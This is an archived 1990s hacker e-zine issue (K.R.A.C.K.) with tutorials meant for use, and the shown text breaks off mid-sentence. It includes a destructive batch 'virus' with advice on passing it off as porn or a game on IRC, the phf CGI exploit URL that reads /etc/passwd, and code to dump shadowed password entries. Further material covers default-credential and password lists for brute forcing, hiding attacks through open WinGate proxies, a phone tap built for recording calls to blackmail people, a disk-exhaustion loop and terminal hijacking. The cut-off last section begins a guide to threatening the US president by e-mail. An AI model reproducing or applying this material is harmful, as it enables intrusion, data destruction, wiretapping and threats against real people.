The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / nkrack1.txt < prev next >

Wrap

Text File | 2003-06-11 | 60.4 KB | 1,747 lines

KK KK RRRRRRR AAA CCCCCCCCCC KK KK KK KK RR R AA AA CC KK KK KKKKKKK RRRRRRR AA AA CC KKKKKKK KK KK RR RR AAAAAAAAA CC KK KK KK KK RR RR AA AA CC KK KK KK KK OO RR RR OO AA AA OO CCCCCCCCCCC OO KK KK OO ||==--Killer Ride And Chilling Kraftwork--==|| -------------------------------------------------------------------------- -------------------------------------------------------------------------- Disclaimer: We the writers, and or members of K.R.A.C.K. Claim no responsibilty for the use of this material. It is intended for educational, and inspirational... psyke, just messing, no seriously, we do not recomend that you use any of this material, it may lessen your ammount of time in the "free world" considerably. So watch out. -------------------------------------------------------------------------- -------------------------------------------------------------------------- Index: - Intro - Hacking - Hacking II - Hacking III - Phreaking - Kracking - Anonomizer - Unix Hacking - IP-Spoofing - Info for beginning Unix Hackers - Messin with tha president! - Tips From Sygma - List of members - Closing notes --------------------------------------------------------------------------- --------------------------------------------------------------------------- Intro: WEEEEEEEEEEEEEEEEEERRRRRRRREEEEEEEEEEEEE BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCKK DID YOU MISS US??? Yup thats right, K.R.A.C.K. is coming back full strength, and more. All new members, all new webpages, all new ideas. First let me fill you in on our new policy. DESCRIPTION OF THE NEW KRACK: The New Krack is the reviving of the old Krack with the intention to give the publice a realistic perception of "real" hackers. And not what the media has made us out to be. However, we will not be centered around hacking we will also program, trade warez, and other interesting things. This org. will be for the motivated only, unless you fit this description, dont even think about it. EXPECTATIONS OF ALL MEMBERS: All members are expected to contribute to KRACK... Which means writing at least one text for the e-zine a month, AND/OR in the case of a *special* membership agreement you must obide by that special agreement. Failure to do this will result in probation and possible banning from this organization. These standards may seem harsh but we plan to have a long lasting, strong, organization, and to do so we cant tolerate slackers. FUTURE PLANS: Our future plans include the following: a newsletter that will be put out monthly, a 1-800 # bbs, a new irc server, possibly a convention this summer, and maybe a ftp and telnet site. That About sums up the NEW COMPLETELY REVISED K.R.A.C.K -NeTDeViL DocKooL --------------------------------------------------------------------------- --------------------------------------------------------------------------- Hacking: ******************************************** * Popper Exploit : By DocKool of K.R.A.C.K * ******************************************** ************ * About * ************ This file will explain to you how to root owned files on shells using the popper daemon. If you do not have a shell login on systems that have var/spool/mail mode 'drwsrwxrwt' then please dont try whats in this text cause it wont work. This file may be a little too technical for most beginner's, but im not good at explaining things so dont bitch at me! ************** * What to do * ************** #line 59 of pop_dropcopy.c: # currently running as root: (POP_TMPDROP is /usr/spool/mail/tmpXXXXXX) > strcpy(template,POP_TMPDROP); > (void) mktemp(template); # Now you begin # If a user guesses the pathname in "template", they probably made a link to # /etc/nologin, instead of using a script to exploit this bug you can verify # wether it exists or not by adding sleep(30) here -- after the mktemp(). # Obviously you need root to accomplish this task... > if ( (tf=fopen(template,"w+")) == NULL ) { /* failure, bail out */ > pop_log(p,POP_PRIORITY, > "Unable to create temporary temporary maildrop '%s': %s",template, > (errno < sys_nerr) ? sys_errlist[errno] : "") ; > return pop_msg(p,POP_FAILURE, > "System error, can't create temporary file."); > } # Right about here the file was probably created. > /* Now give this file to the user */ > (void) chown(template,pwp->pw_uid, pwp->pw_gid);] > (void) chmod(template,0600); > /* Now link this file to the temporary maildrop. If this fails it > * is probably because the temporary maildrop already exists. If so, > * this is ok. We can just go on our way, because by the time we try > * to write into the file we will be running as the user. > */ > (void) link(template,p->temp_drop); > (void) fclose(tf); > (void) unlink(template); > /* Now we run as the user. */ > (void) setuid(pwp->pw_uid); > (void) setgid(pwp->pw_gid); ********** * Note * ********** If your /var/spool/mail is mode 'drwsrwxrwt' this code isn't necessary. Remove lines 59-82 of pop_dropcopy.c. This doesn't entirely solve the problem, especially if root reads their mail via popper. The best solution is to not have /var/spool/mail with world write permissions, as this same type of problem exists in atleast one delivery agent (/bin/mail), and probably in user agents. ~~~~Added By DocKool~~~~ -------------------------------------------------------------------------- -------------------------------------------------------------------------- Hacking II: BlueRains WinGate Page (ready to hack without being caught?) [Hide your IP trail] Another discovery by the BR Networking Team --------------------------------------------------------------------------- What is WinGate? WinGate is a like Proxy / Gateway server. It allows many Windows based PC's to connect to the internet all at once, using just one dial up or permanent connection with few limitations over that of a single PC with an internet link. Goto the WinGate home page if you want to learn more about WinGate or download it (highly suggested). --------------------------------------------------------------------------- What can WinGate do for me? WinGate has a major flaw with its default installation. It allows you to hide your IP address, by routeing whatever you are doing through someone else's machine running WinGate. Basically... a lame hackers way of IP Spoofing (but it works!!!). And the best part is... WinGate keeps NO logs!!! So they (the site you route through) dont even know you are doing it unless they are watching (highly unlikely). And even then, they may not even realise what is happening. And even then, they have NO way to prove you did it!!! --------------------------------------------------------------------------- What can I do through WinGate? You route through Wingate, by connecting to the persons machine running Wingate. Netscape, IE both allow you to point your browser to route through another machine (like one running Wingate). You can route FTP and HTTP through Netscape and IE through a machine running WinGate. See the "Options/Network Preferences/Proxies/Manual Proxy Configuration" option for Netscape. See the "View/Options/Proxy Server/Settings" option for Internet Explorer. To Telnet though a WinGate machine, just telnet to the machine running WinGate, and you will be greeted with this prompt 'WinGate>' Then just type 'x.x.x.x yyyy' or 'zzzzzzz yyyy' or 'zzzzzzzz' or 'x.x.x.x' where x.x.x.x is the machine you want to logon to's ip number, zzzzzzzz is its DNS name and yyyy is the port you wish to connect to. ie: '193.25.41.3 25' will take you to the machine at 193.25.41.3 at port 25 and 'www.microsoft.com 21' will take you to microsoft at port 21 (ftp port). --------------------------------------------------------------------------- What ports can I route through, via a WinGate machine? Default Wingate installation ports: 21 FTP 23 Telnet 80 WWW 110 POP3 1080 SOCKS4 1090 RealAudio --------------------------------------------------------------------------- How does this hide my IP address? There are 3 machines involved when you want to hack a site and hide your ip via Wingate. Your machine (me.isp.com), the machine running WinGate you are going to route to (wingate.dummy.com), and the machine you want to hack (www.nasa.gov). Now, if you route through the wingate.dummy.com, it will look like wingate.dummy.com is the machine that is connected to www.nasa.gov. So www.nasa.gov's logs will show up a connection from wingate.dummy.com and not from me.isp.com. The reason this happens, is the wingate.dummy.com site, has a few pc's, which all connect out of their local lan, via their wingate.dummy.com machine (through Wingate) and out onto the net. Now, you are connecting to their WinGate machine just like the machines on their local network (*.dummy.com). So you come into wingate.dummy.com from the internet, not their local network, and then go back out onto the net, as the machines on their local network do. This is because, WinGate does not stop machines coming in and going back out from the internet. Nice design flaw. --------------------------------------------------------------------------- Common questions Q. Does WinGate have to be running on my machine? A. No, you are using the copy of WinGate running on someone elses machine (on the internet) to hide your IP address from the site you want to hack, so it looks like you are coming from the site running WinGate. Q. Can I be traced when I connect to someones machine running WinGate? A. Your IP address will show up in one window on WinGate (download WinGate to see) machine, but it is not logged, and the site running WinGate cannot tell what you are connecting to from them. Q. Does this work for all versions of WinGate? A. Currently YES. But version 2 of WinGate is due out soon, which will incorporate logging and access controls. Thus, sites running version 2 will be useless to hide your tracks. Q. Does WinGate run on Win 3.1 / Win 95 / Win NT A. Yes. Q. How do I find a machine running WinGate to route though? A. Thats up to you to figure out... happy hunting Q. I want to use WinGate for my own lan, is this safe? A. No, it is not safe. Rather use Microsofts Proxy Server (much better than WinGate, but still in beta, but it does provide better net connection, logging and access controls. Requires Windows NT 4). Q. Is there a registration crack out for Wingate? A. Yes, it works for most versions. Download it here: WinGate Crack --------------------------------------------------------------------------- So what now? Well, now its time for you to go out and find machines running Wingate... and begin hiding your ip trail... --------------------------------------------------------------------------- Contact: BlueRain Contact: BlueRain (c) 1996 - BR Networking Team [Powered by MicroSoft BackOffice] ~~~~Added By BlueRain~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- Hacking III: ***************************** * How to make a Batch Virus * * By DocKool * * & * * NeTDeViL * ***************************** K.R.A.C.K. Killer Ride And Chilling Kraftwork Ok, In this text we will explain to you how to make a virus, like a trojan horse, in a Batch file. Its quite easy... If you know anything about the DOS commands (I hope for your sake you do). Anyways back to the virus. First open up Notepad.exe or use dos's very handy editor (or any other text editor you have), next do the following; (any line beginning with a * is us) ECHO OFF *this stops the user from seeing what the batch file is doing CD\ *This will bring the virus to DOS and into the defualt drive. ECHO Y | del c:\test\*.* *This will delete all files in the test directory. It will not delete the sub directories in the test directory! So then you must ad a line like this; ECHO Y | del c:\test\sub\*.* *That will delete all the files in the test\sub directory now, you can imagine the possibilities, of all the directories you could delete. For instance if you wanted, you could make a Winblows, mIRC, or Netscape virus, that would say; ECHO Y | del c:\netscape\*.* *You get the picture? Next you will want to add something like this; ECHO HAHA YOU LOOZER I FUCKED YOU UP YOU SUNUVABITCH * this will display HAHA YOU LOOZER.... in dos and the user will be wondering what the hell your talkin about. *Now save your file to .bat (virus.bat). After that you want to obtain a program called bat2exec.com this program will turn your .bat file into an .exe we will have one available from the krack web site. *When all done, you can play around with it a little, make a virus, and save it as porno.exe, then go in the porno channels on IRC and send it to some horny lamer. Or make a zip file and put your virus in with a name like install.exe, also put some other garbage files in there so the zip will apear bigger. Next go in some warez channel and claim that the zip is a great game. The possibilities are endless, just use your imagination. (this works really well in channelst with fserve available so you can plan each and every directory. :) *The following is an example virus that would kill a directory called c:\test ECHO OFF CD\ ECHO Y | del c:\test\*.* ECHO Y cls echo. I just fucked up your test directory!!! echo. Dont you feel dumb??? *Try making some virus's like this and set them up to delete directories you dont care about, like c:\test\ Thats the best way ive found to troubleshoot your virus. Good luck!!! USAGE: The posibilities for this are limitless, and any moron can do it. If you could get a bat file that will reboot the cpu, and give it to somebody on irc, you could take their channel. You could get it to copy a bullatin boards password file into the download forum, and then pop in and download it, you could get this thing to do about anything. By the way, if you do come up with a way to get the bat file to reboot the system, please email us, or if you have any updates to this file, email us. (email addresses listed below) ~~~~Added By DocKool & NeTDeViL~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- Phreaking: DeViLBoX ^^^^^^^CReaTeD By NeTDeViL^^^^^^^ Brought to you by K.R.A.C.K Da K-Rad Hack Society Disclaimer This box was written for entertainment, and educational purposes only. I do not recomend you use any of this information. And i claim no responsibilty for your actions. Neither does K.R.A.C.K or any of its members. So dont be a moron and use this info wisely. What you need A phone you can "Modify" A walkman with recording capabilites headphones some copper wire some electric tape an electric switch Purpose Yes i know this box is a lot like others youve read, but it uses some concepts from other boxes, with my own little satanic twist. So read and enjoy. First you need to read the beige box and modify your phone acordingly. when thats done then complete the following instrucions and you will have your devil box. What a DevilBox does well the devil box taps phones without a trace. Normally when tapping a phone you can be heard on both ends because your phone reduces the ammount of voltage running thru the line. Also you will be able to record the phone conversations for blackmailing. How To ok now youve got your beige box and your ready for the devil box. first things first. we need to fix the phone with a mute switch. what you need to do is open the reciever of your phone, and locate the microphone. there should be two wires connecting microphone to the board. Cut one of these in half, then strip the wire on both ends. use the electric tape to bond the half of the wire that is connected to the microphone to a 3 inch piece of copper wire. then connectthe other end of the copper wire to the electric switch, and the half of the wire that is connected to the board should be connected to the other side of the electric switch. Now you should have a mute switch. Now when the switch is open and you pick up the phone it should cause 0 resistance, making you untracable. heres the diagram switch | | |-------------------| | | | microphone |||------o/o-------------|- | |||----------------------|- | ^ |___________________| | | 2 wires connecting mike to board now you need to locate the speaker in the reciever there should be 2 wires leading into this too. Snip these 2 wires in half at this point you can throw away the speaker you wont need it. Then strip both of the wires still connecting to the board. Add copper extensions to these wires. now open up your walkman. There should be two wires leading from the spot where you can insert a mircrophone. Snip these and connect the copper extensions to the halves of the wires that connect to the green board. now plug in your headphones. now with the switch closed you should be able to hear yourself talking into the phone through the headphones. and with the switch up you shouldnt be able to hear yourself, just the dialtone. if so youve correctly constructed the devil box. Now just insert a tape and when you eavsdrop you can record it. Congradulations. Possible uses If you are bothering to read this section your an idiot, its obvious what you use this box for. ~~~~Added By NeTDeViL~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- Kracking: --------------------------------------------------------------------------- --------------------------------------------------------------------------- ANONOMIZER: You may have seen numerous advertisements on the net for a security web site called Anonymizer(http://www.anonymizer.com). The web page claims to hide your IP trail, to fool the logs. At first glance, every hacker in the world thought, "YES!! NO MORE TELNET BOUNCING!!!", but alas, it isn't as secure as it seems. The whole idea behind Anonymizer is a CGI script that basically telnet bounces, but through the World Wide Web port. It has the same principles, but the WWW port is set up different than the telnet, so it has faults. I was recently privied to an IP log of a major server(to remain nameless) and you could easily pick out the Anonymizer users. The truth is, Anonymizer leaves an IP trail the size of the Great Wall of China, all ending with your original IP. Anonymizer is good to fool those java applets that show who you are, but not much else. So before you go and try to use it, think to yourself, "Do I want my IP on the logs?" If you don't care, be my guest and use it. But if you are gonna try something nasty, be careful. -=-_-=disLeXiC=-_-=- ~~~Added By disLeXiC~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- UNIX HACKING: * What is KRACK? * we are the true 'cyberkings' the owners of the world the elite of the elite the Bill clintons of the net we will choose our destiny and the nets destiny because we are hackers We Are KRACK! -------------------------------------------------------------------------------- Stradegie For Getting Root With a shadowed Passwd step#1 anonymous ftp into the server get passwd step #2 To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file. Example: #include <pwd.h> main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } Or u can Look for the Unshadowed Backup..... Unix Path needed Token ---------------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files/<first letter # of username>/<username> A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/<first letter * of username>/<username> SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow <optional NIS+ private secure maps/tables/whatever> System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb Step #3 crack it step #4 login and type this /usr/local/bin/suidperl chmod 4700 schperl.pl now we have root perms...!!!!!!!!!!!!!!! ======================================= C-ya everyone hope u ENjoy, OD^PHREAK ~~~~Added By OD^PHREAK~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- IP-Spoofing: "WHAT IS SPOOFING" IN LAMENS TERMS- By NeTDeViL ============================================= Now I know most of us already know this one, but if you sit in #hackteach on undernet long enough, your chances of seein some lamer come in and ask about an IP-Spoofer are pretty high. So if you want to know what this is SHUTUP AND READ DAMNIT! SPOOFING- An attempt to gain access to a system by posing as an authorized user. Now for a more detailed explenation. Say Joe@some.domain.com wants to log into ftp.lamers.org and download their password file. He couldnt do this under normal conditions (unless using a hacked shell) because they would simply check their logs and see who it was. Now Joe dont wanna get caught so he loads up is IP-Spoofer, and it changes his ip address to Hacker@some.domain.com. Now even his ISP thinks he is hacker@some.domain.com. So now he goes to ftp.lamers.org and downloads their passwd file. Then disconnects. and cracks the file. Meanwhile lamers.org is sitting here looking through their logs at whodunnit. up comes hacker@some.domain.com. they call some.domain.com up, and they dont know who it was either, since most likely there wont be a hacker@some.domain.com so joe is sittin high and dry so to speak. Q.) Do IP-Spoofers really exist? A.) Yes, but only for systems that use a Unix based OS. The reason for this is when you try to run a spoofer, it closes winsock.dll. And your not connected anymore, so it doesnt work. But they come for most unix based systems. --------------------------------------------------------------------------- Q.) How do i find a spoofer? A.) The web sure comes in handy sometimes... i just love those search engines. Our page is wrather interesting too, i think im gonna upload some software to it pretty soon. One place i found with a GOOD IP Spoofer that actually Works is at... HTTP://ww2.succeed.net/~coder ~~~~Added By NeTDeViL~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- Info for beginning Unix Hackers: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++| | | | | | So You Wanna Be a HACKER? | | | By Defiant | Member of K.R.A.C.K |++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Purpose of this file: To inform those of you out there that "think" your hackers what a true hacker is and how to be one. And to inform those of you who want to be a hacker why you should or shouldn't be one depending on what your views are of a hacker. But basically its an absolute beginners guide to hacking. Contents: Section 1 Why do you want to be a hacker? Section 2 What do you think a hacker is? Section 3 Read this manifesto! Section 4 What you need to start on your quest Section 5 Lets get started! Section 6 Navigating Unix ********************************************************************* S E C T I O N 1 Why do you want to be a hacker? Before you get started ask yourself why you want to pursue the art of hacking. Are curious about whats out there? Do you want to cause havok? Revenge? To Learn? If your goal is to crash a system or steal something (unless its information that should be free!) then stop right now and read the manifesto in section 3. If your goal is to uncover information, learn, or your just curious about the possiblilities of the internet and its intriquit networks and varieties of systems, then you are ready to learn this sacred art! ********************************************************************* S E C T I O N 2 What do you think a Hacker is? Now that you know why you want to be a hacker you need to know what a TRUE hacker really is. There are those who think they are hackers and those who ARE hackers. Those who think they are, are the criminals who waste precious time to steal card #'s, crack games, mail bomb someone (now that is lame), or just trash a system. They are the TRUE LAMERZ. The true hacker is in a pursuit to fulfill his curiosity or to gain knowlege that others do not possess (or knowledge that SHOULD be free) and once you have knowlege you have power! Which i just now realized is probably most hackers real purpose, to feel power over someone or some system. Glad i'm writing this file because even I am learning as I write this. Here are some rules to use when you become a hacker: 1. Never damage any system. This will only get you into trouble. 2. Never alter any of the systems files, except for those needed to insure that you are not detected, and those to insure that you have access into that computer in the future. 3. Do not share any information about your hacking projects with anyone but those you'd trust with your life. 4. When posting on BBS's (Bulletin Board Systems) be as vague as possible when describing your current hacking projects. BBS's CAN be monitered by law enforcement. 5. Never use anyone's real name or real phone number when posting on a BBS. 6. Never leave your handle on any systems that you hack in to. 7. DO NOT hack government computers. 8. Never speak about hacking projects over your home telephone line. 9. Keep all of your hacking materials in a safe place. 10. To become a real hacker, you have to hack. You can't just sit around reading text files and hanging out on BBS's. This is not what hacking is all about. ************************************************************************* S E C T I O N 3 Read this manifesto I think EVERYONE should read this manifesto by the MENTOR. THE CONCIENCE OF A HACKER BY THE MENTOR Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three- piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike. The Mentor ************************************************************************* S E C T I O N 4 What you need to start hacking. Text files. You need to read as many text files as you can get a hold of. I have loads at http://www.elkhart.net/~sborosh/hacking/text/info.html Programs: You need a Telnet application to remotely log into another system. If you are using win95 you have one already. Just go to the start menu and then to run and in the box type telnet and click ok. If not go to http://www.elkhart.net/~sborosh/hacking/filez/qvt.zip to get one. To transfer files you need an ftp (File Transfer Protocol) program. Again windows 95 comes with one. But i recommend Cuteftp just search for it with webcrawler or something. Those are the two main programs you need to navigate your way into systems. MORE FILEZ: Once you get into these systems there are some programs you can run and some exploits (an exploit is a hole in the security which allows you to gain access) I have loads of filez at www.elkhart.net/~sborosh/hacking/filez/filez.html I will explain how to use some of them later in this phile. ************************************************************************** S E C T I O N 5 Getting started on your journey into the unknown! Ok now that you have the files to do so lets learn how to hack. Before you can actually hack a system you need to know the type of system you are dealing with. The most common system you will run into is UNIX or a unix compatible server. There are many different types of UNIX. They are CPIX,Berkeley Ver 4.1,Berkeley 4.2,FOS,Genix,HP-UX, IS/I,OSx,PC-IX,PERPOS, Sys3, Ultrix, Zeus, Xenix, UNITY, VENIX,UTS,Unisys, Uniplus+, UNOS,Idris,QNIX,Coherent,Cromix,System III,System 7,Sixth edition, and most recently LINUX. But don't worry they use most of the same commands. You won't need to learn 100's of commands for each system! Some other systems there are but I won't get into much because you are just beginning are VAX, DEC,PRIME and there are many more. Now you need to find a system to hack. If you know of any cheezy colleges around or even a big one that you would like to hack an account on they are the easiest to hack into for your first hack. This bug i am going to show is is called the phf bug it can still be used in some places. But no thanks to 2600 magazine the phf bug was let out to the public and many administrators have locked the bug out. Here is how it works: Find a computer you want to hack I.E www.hackland.com Open your browser and type www.hackland.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd If it says phf not found on system then you are out of luck but if you get Query Results then you might have a chance of getting the passwd file. If the passwd file came on your screen save it to a directory as passwd Then run a cracker program such as cracker jack , or the newly released john cracker on the passwd file. You can find a password crack on my site at www.elkhart.net/~sborosh/hacking/filez/filez/html If you get query results and no file then their passwd file is under a different name. Here are the names of the passwd files on certain systems. Use the same command just after cat%20 put the new directory and filename ie /etc/shadow UNIX System Type: Path: Token: AIX 3 /etc/security/passwd ! or /tcb/auth/files/<first letter of # username>/<username> A/UX 3.Os /tcb/files/auth/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * Convex0S 11 /etc/shadow * DG/UX /etc/tcb/aa/user * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO UNIX #.2.x /tcb/auth/files/<first letter of * username>/<username> SunOS 4.1+c2 /etc/security/passwd.adjunct ## SunOS 5.0 /etc/shadow System V 4.0 /etc/shadow x System V 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * Now if the phf bug doesnt work i always ask around to see if anyone I know has a shell account on that system i could use. A shell account is a user account that allows access to filez and programs. But if you dont know anyone with a shell account on the system it is time to brute hack. Brute hacking is just guessing the password until you get in. Yes this can be boring so crank up your music and turn on the tv. If you have a shell account on another system log into as many accounts as you can before you log into the system you want to hack to hide where you are coming from. So it would look something like this: your isp ----telnet to-> shell #1 ------->shell#2------>the comp you want to hack. If you have a shell and dont know what to type to telnet to another computer all you have to type is telnet then you will get the prompt telnet> type open and you will get the prompt to> then type the address of the site you want to hack. If phf doesn't work you'll most likely have to resort to Brute Force Hacking. To brute hack you must have a lot of pacience because it could take a long time. Brute Force Hacking Described by members of LOD ~~~~~~~~~~~~~~~~~~~ There will also be many occasions when the default passwords will not work on an account. At this point, you can either go onto the next system on your list, or you can try to 'brute-force' your way in by trying a large database of passwords on that one account. Be careful, though! This works fine on systems that don't keep track of invalid logins, but on a system like a VMS, someone is going to have a heart attack if they come back and see '600 Bad Login Attempts Since Last Session' on their account. There are also some operating systems that disconnect after 'x' number of invalid login attempts and refuse to allow any more attempts for one hour, or ten minutes, or some- times until the next day. The following list is taken from my own password database plus the data- base of passwords that was used in the Internet UNIX Worm that was running around in November of 1988. For a shorter group, try first names, computer terms, and obvious things like 'secret', 'password', 'open', and the name of the account. Also try the name of the company that owns the computer system (if known), the company initials, and things relating to the products the company makes or deals with. Anyway here are some common passwords to use when brute hacking: These are super user accounts. Login: Password: root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo Or if it is a users account guess these passwords: The password list was taken from A Novice's Guide To Hacking, by The Legion Of Doom, and from some of my own discoveries. Here is the list of commonly used passwords: Password: aaa academia ada adrian aerobics airplane albany albatross albert alex alexander algebra alias alisa alpha alphabet ama amy analog anchor andy andrea animal answer anything arrow arthur ass asshole athena atmosphere bacchus badass bailey banana bandit banks bass batman beautiful beauty beaver daniel danny dave deb debbie deborah december desire desperate develop diet digital discovery disney dog drought duncan easy eatme edges edwin egghead eileen einstein elephant elizabeth ellen emerald engine engineer enterprise enzyme euclid evelyn extension fairway felicia fender finite format god hello idiot jester john johnny joseph joshua judith juggle julia kathleen kermit kernel knight lambda larry lazarus lee leroy lewis light lisa louis love lynne mac macintosh mack maggot magic malcolm mark markus martin marty marvin matt master maurice maximum merlin mets michael michelle mike minimum nicki nicole rascal really rebecca remote rick reagan robot robotics rolex ronald rose rosebud rosemary roses ruben rules ruth sal saxon scheme scott secret sensor serenity sex shark sharon shit shiva shuttle simon simple singer single singing smile smooch smother snatch snoopy soap socrates spit spring subway success summer super support surfer suzanne tangerine tape target taylor telephone temptation tiger tigger toggle tomato toyota trivial unhappy unicorn unknown urchin utility vicki virgin virginia warren water weenie whatnot whitney will william winston willie wizard wonbat yosemite zap Once you have gotton in you need to get the passwd file. Type etc/passwd or cat /etc/passwd or ypcat passwd Depending on what system you are in. Once you get the passwd file this is what it looks like and means. john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john Broken down, this is what the above password file states: Username: john Encrypted Password: 234abc56 User Number: 9999 Group Number: 13 Other Information: John Johnson Home Directory: /home/dir/john Shell: /bin/john But if you get a passwd file that is shadowed you will see john:*:9999:13:John Johnson:/home/dir/john:/bin/john If you get this copying the passwd file wont help. The unshadowed passwd file is usually /etc/shadow but you probably dont have permission to get it unless you have a super user account. If it is shadowed and you still want to pursue a superuser account try running some source code which you can find at www.elkhart.net/~sborosh/hacking/filez/filez.html ************************************************************************************************************ S E C T I O N 6 Navigating Unix In this section I am going to give you some useful commands for navigating and using unix. First off there is the who command which tells you who is on the system you are in. Here is how to use the who command: who -b Displays time sys as last booted. who -H Precedes output with header. who -l Lists lines waiting for users to logon. who -q displays number of users logged on. who -t displays time sys clock was last changed. who -T displays the state field (a + indicates it is possible to send to terminal, a - means u cannot) who -u Give a complete listing of those logged on. who -HTu is the best choice talk <username> allows you to chat with another user write <username> writes e-mail to that user. ls lists files in your current directory du -a Checks the amount of memory you have, or disk space cd\name (name is the name of the sub-directory you choose) cd\ (brings your home directory to current use) help brings up some commands you can use man <command> gives you all options on using that command This next command will create havok on a system while : ; do mkdir x cd x done Either a panic will occur because all the i-nodes on the device are used up, or all the disk blocks will be consumed, thus preventing anyone from writing files on the device.I ----------------------------------------------------------------------------- This next section was provided by CarbonBoy When a users state field (see -T flag option for who command) says that a user has their message function on, this actually means that it is possible to get stuff onto their screen. Basically, every terminal on the system has a file corresponding to it. These files can be found in the /dev directory. You can to anything to these files, so long as you have access -eg you can read them, and write to them, but you will notice that they never change in size. They are called character specific files, and are really the link between the system and the terminals. Whatever you put in these files will go staright to the terminal it corresponds to. Unfortunately, on most systems, when the user logs in, the "mesg n" command is issued which turns off write access to that terminal, BUT- if you can start cating to that terminal before system issues the mesg n command, then you will continue to be able to get stuff up on that terminal! This has many varied uses. Check out the terminal, or terminal software being used. Often you will be able to remotely program another users terminal, simply by 'cating' a string to a users screen. You might be able to set up a buffer, capturing all that is typed, or you may be able to send the terminal into a frenzy- (sometimes a user will walk away without realizing that they are sill effectively logged on, leaving you with access to their account!). Some terminal types also have this great command called transmit screen. It transmits everything on the screen, just as if the user had typed it ! So just say I wanted to log off a user, then I would send a clear screen command (usually ctrl l), followed by "exit" followed by a carriage return, followed by the transmit screen code. Using ths technique you can wipe peoples directories or anything. My favourite is to set open access on all their files and directories so I can peruse them for deletion etc at my own leisure). End of Section by CarbonBoy -------------------------------------------------------------------------- I hope this little file is some help to you beginners. Its always nice to see new new handles on irc and to have people ask questions. Keep on hackin and don't get caught!! /////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\ | By DEFIANT | /////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\ ~~~~Added By Defiant~~~~ --------------------------------------------------------------------------- --------------------------------------------------------------------------- Mesin with da president!: ^^^^^^^NOTE FROM THA EDITOR^^^^^^^ This is a pretty touchy subject wich could get you caught fast... we do not support or recomend using the contents of this file, nor any other files in this zine... Please Keep That In Mind As You Read This Text. "NEET TRICKS TO PLAY ON BILL CLINTON" By: CooL_MoDe (That's mode, not moe "D" you fuckers) Ok Children. All you anti-political assholes out there should really enjoy this one. How many of you have ever wondered, "Gee, wouldn't it be fun to do something to the President?" Well, now you can. I am writting a 3 part article on different things you can do to old BC. Each one has something to do with the H/P/V/A/C world. Part 1: E-Mail Threats!!!!! In this litle article I will teach you how to send threatning 